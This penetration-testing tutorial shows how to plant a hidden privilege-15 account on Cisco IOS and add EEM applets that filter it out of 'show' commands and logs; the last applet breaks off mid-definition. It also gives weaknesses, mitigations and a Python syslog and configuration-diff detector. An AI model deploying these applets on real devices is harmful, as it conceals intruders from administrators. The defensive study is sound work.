Penetration Testing: How to Hide an Admin User on Cisco IOS (Router/Switch) Platform
Beginning Reminder: This article is written for research and experimentation purposes only. Only ever access devices you have written, legal authorization to access.
Okay, so here's the scenario. You found your way into an elevated command prompt on a Cisco router, and you want to establish a persistent foothold on the device while leaving as few markers as possible. You need to do this with existing code, and you'd like to alter as little as possible. Cisco's EEM is the answer.
Cisco EEM (Embedded Event Manager) is a scripting and automation facility built into any modern Cisco IOS switch or router. It allows for all sorts of automatic actions to take place, and it also has a key feature which we'll exploit here: it can "catch" a string a user enters and transparently replace it with another string, one which we'll instruct to exclude our "malicious" pivot code.
Okay, so you're on an exec command line, what's next?
1. Create a user all your own with exec (priv 15) permissions:
! Note: Make sure the username contains the string "hidden", because those are the lines we are hiding from the configuration below
config t
username hidden_YourUser priv 15 sec yourPassword1234
2. Install a few EEM applets, which do the following:
Hide our user and our history from any valid admins by proxying valid commands with filtered versions of the same commands that hide our information.
EEM Code:
! Hides the EEM code from the running config show command
event manager applet hidden_eemRunningConfig
 event cli pattern "show run" sync yes
 action 0.0 cli command "enable"
 action 1.0 cli command "show run | ex hidden|event|action"
 action 2.0 puts "$_cli_result"
! Hides the EEM code from the startup config show command
event manager applet hidden_eemStartupConfig
 event cli pattern "show start" sync yes
 action 0.0 cli command "enable"
 action 1.0 cli command "show start | ex hidden|event|action"
 action 2.0 puts "$_cli_result"
! Hides the bad actor's active VTY (telnet/ssh) session
event manager applet hidden_VTY
 event cli pattern "show users" sync yes
 action 0.0 cli command "enable"
 action 1.0 cli command "show users | ex hidden"
 action 2.0 puts "$_cli_result"
! Hides the bad actor's active SSH session
event manager applet hidden_sshSession
 event cli pattern "show ssh" sync yes
 action 0.0 cli command "enable"
 action 1.0 cli command "show ssh | ex hidden"
 action 2.0 puts "$_cli_result"
! Hides the EEM actions from showing up in local logging via the show command
event manager applet hidden_eemLogging
 event cli pattern "show log" sync yes
 action 0.0 cli command "enable"
 action 1.0 cli command "show log | ex HA_EM|hidden"
 action 2.0 puts "$_cli_result"
! Hides the EEM applets and the new user from the output of the "more system:running-config" command
event manager applet hidden_moreRunning
 event cli pattern "more system:running-config" sync yes
 action 0.0 cli command "enable"
 action 1.0 cli command "more system:run | ex hidden|event|action"
 action 2.0 puts "$_cli_result"
! Hides the EEM applets and the new user from the output of the "more system:startup-config" command
event manager applet hidden_moreStart
 event cli pattern "more system:startup-config" sync yes
 action 0.0 cli command "enable"
 action 1.0 cli command "more system:start | ex hidden|event|action"
 action 2.0 puts "$_cli_result"
! Prevents EEM from being debugged, which could catch our malicious EEM applets in action
event manager applet hidden_EEMdebug
 event cli pattern "debug event manager" sync yes
 action 0.0 cli command "enable"
Weaknesses of This Method
Syslog/external logging: there is no way to hide the execution of commands in real time, so they will be logged to an external server if the device is set up to do so.
All EEM scripts are hidden by this method, not just ours. If administrators use EEM for their admin duties, they may become suspicious when their own EEM scripts disappear from the configuration.
Config backup: if the backup tool uses SNMP to pull a full config, your new config and user are visible. If the tool is like most tools and simply uses a service account to programmatically run "show run", your config will stay hidden.
The local log buffer of the device will have many lines filtered out of it, so it will look short to someone looking closely.
If the local log carries sequence numbers, as recommended by Cisco security best practice (the service sequence-numbers command, which is not the default config!), it will be evident to someone looking closely that lines are missing.
Mitigation for Administrators
1. Syslog, syslog, syslog. First, to catch the initial changes, by shipping log messages off the device promptly and frequently. Second, to catch the EEM applets in action as they intercept the legitimate user's commands and hide themselves. Third, to catch any further activity by the bad actor as they perform future actions on the system.
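As an added example (not code from the article), the Python script below puts the two detection angles that the weaknesses list and the mitigation above describe into practice: scanning forwarded syslog for the configuration changes and EEM activity the applets cannot suppress off-box, and comparing a configuration pulled out of band (SNMP/TFTP archive) with the one captured over the CLI. All log lines, the sample configuration, host names and account names are constructed for the example; %SYS-5-CONFIG_I, %PARSER-5-CFGLOG_LOGGEDCMD and %HA_EM-6-LOG are real IOS message identifiers, but their exact wording varies by release, and the %PARSER lines only appear when configuration logging with syslog notification is enabled on the device.

```python
import re

# Constructed sample syslog, as an external collector might receive it from a
# router where the article's user and applets were installed. Hostname, user,
# addresses and message wording are placeholders; real text varies by IOS
# release. The %PARSER-5-CFGLOG_LOGGEDCMD lines need config logging enabled
# ("archive" -> "log config" -> "logging enable" / "notify syslog").
SAMPLE_SYSLOG = """\
Jan 10 10:01:02 router1 123: %SYS-5-CONFIG_I: Configured from console by hidden_YourUser on vty1 (192.0.2.10)
Jan 10 10:01:03 router1 124: %PARSER-5-CFGLOG_LOGGEDCMD: User:hidden_YourUser  logged command:username hidden_YourUser privilege 15 secret *****
Jan 10 10:01:05 router1 125: %PARSER-5-CFGLOG_LOGGEDCMD: User:hidden_YourUser  logged command:event manager applet hidden_eemRunningConfig
Jan 10 10:01:06 router1 126: %PARSER-5-CFGLOG_LOGGEDCMD: User:hidden_YourUser  logged command:event cli pattern "show run" sync yes
Jan 10 11:30:00 router1 140: %HA_EM-6-LOG: hidden_eemRunningConfig: intercepted show run
Jan 10 11:30:01 router1 141: %SYS-5-CONFIG_I: Configured from console by admin on vty0 (192.0.2.50)
"""

CONFIG_I_RE = re.compile(r"%SYS-5-CONFIG_I: Configured from \S+ by (\S+)")
CFGLOG_RE = re.compile(r"%PARSER-5-CFGLOG_LOGGEDCMD: User:(\S+)\s+logged command:(.*)$")
HA_EM_RE = re.compile(r"%HA_EM-\d-\w+: (\w+):")

# Logged configuration commands that deserve an alert on their own: a new EEM
# applet, a CLI-pattern trigger (the hook the article abuses), a privilege-15 user.
SUSPICIOUS_COMMANDS = [
    (re.compile(r"^event manager applet\b"), "new EEM applet configured"),
    (re.compile(r"^event cli pattern\b"), "EEM applet hooks a CLI command"),
    (re.compile(r"^username\s+\S+.*\bpriv(?:ilege)?\s+15\b"), "new privilege-15 user"),
]


def scan_syslog(text, known_admins):
    """Return one finding per suspicious line. known_admins is the set of
    accounts that are expected to change configuration on this device."""
    findings = []
    for line in text.splitlines():
        m = CFGLOG_RE.search(line)
        if m:
            user, cmd = m.group(1), m.group(2).strip()
            for pattern, why in SUSPICIOUS_COMMANDS:
                if pattern.search(cmd):
                    findings.append({"kind": why, "user": user, "detail": cmd})
            continue
        m = HA_EM_RE.search(line)
        if m:  # the applet ran; the local buffer filter cannot remove this copy
            findings.append({"kind": "EEM applet ran", "user": None, "detail": m.group(1)})
            continue
        m = CONFIG_I_RE.search(line)
        if m and m.group(1) not in known_admins:
            findings.append({"kind": "config change by unlisted account",
                             "user": m.group(1), "detail": line})
    return findings


# Constructed out-of-band copy of the config (pulled by SNMP or archived via
# TFTP), as it would look with the article's user and one applet installed.
# The secret hashes are placeholders.
OOB_CONFIG = """\
hostname router1
username admin privilege 15 secret 5 $PLACEHOLDER_HASH$
username hidden_YourUser privilege 15 secret 5 $PLACEHOLDER_HASH$
interface GigabitEthernet0/0
 ip address 192.0.2.1 255.255.255.0
 logging event link-status
event manager applet hidden_eemRunningConfig
 event cli pattern "show run" sync yes
 action 0.0 cli command "enable"
 action 1.0 cli command "show run | ex hidden|event|action"
 action 2.0 puts "$_cli_result"
end
"""

# The article's exclude filter, used here only to simulate what the tampered
# CLI returns so that the comparison has something to detect.
ARTICLE_FILTER = re.compile(r"hidden|event|action")


def simulate_tampered_show_run(config):
    return "\n".join(l for l in config.splitlines() if not ARTICLE_FILTER.search(l))


def missing_from_cli(oob_config, cli_config):
    """Lines present in the out-of-band copy but absent from the 'show run'
    captured over the CLI. Any result at all means the CLI output is being
    filtered; lines mentioning EEM or privilege-15 users are the priority."""
    cli_lines = {l.rstrip() for l in cli_config.splitlines()}
    return [l.rstrip() for l in oob_config.splitlines()
            if l.strip() and l.rstrip() not in cli_lines]


def main():
    for f in scan_syslog(SAMPLE_SYSLOG, known_admins={"admin"}):
        print(f"[syslog] {f['kind']}: user={f['user']} {f['detail']}")
    cli_copy = simulate_tampered_show_run(OOB_CONFIG)
    for line in missing_from_cli(OOB_CONFIG, cli_copy):
        print(f"[config] in out-of-band copy, missing from CLI: {line}")


if __name__ == "__main__":
    main()
```

The comparison also surfaces " logging event link-status", an ordinary interface line that the filter "ex hidden|event|action" removes as collateral; that silent disappearance of unrelated lines is the same effect the weaknesses list predicts for administrators' own EEM scripts, and it is a useful secondary indicator because it is visible even without an out-of-band copy.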
Recommendations for Cisco to Fix This Issue
1. Don't allow aliasing of existing commands. This is messy programming, and it allows many opportunities to cripple a router and confuse admins.
Ending Reminder: This article is written for research and experimentation purposes only. Only ever access devices you have written, legal authorization to access.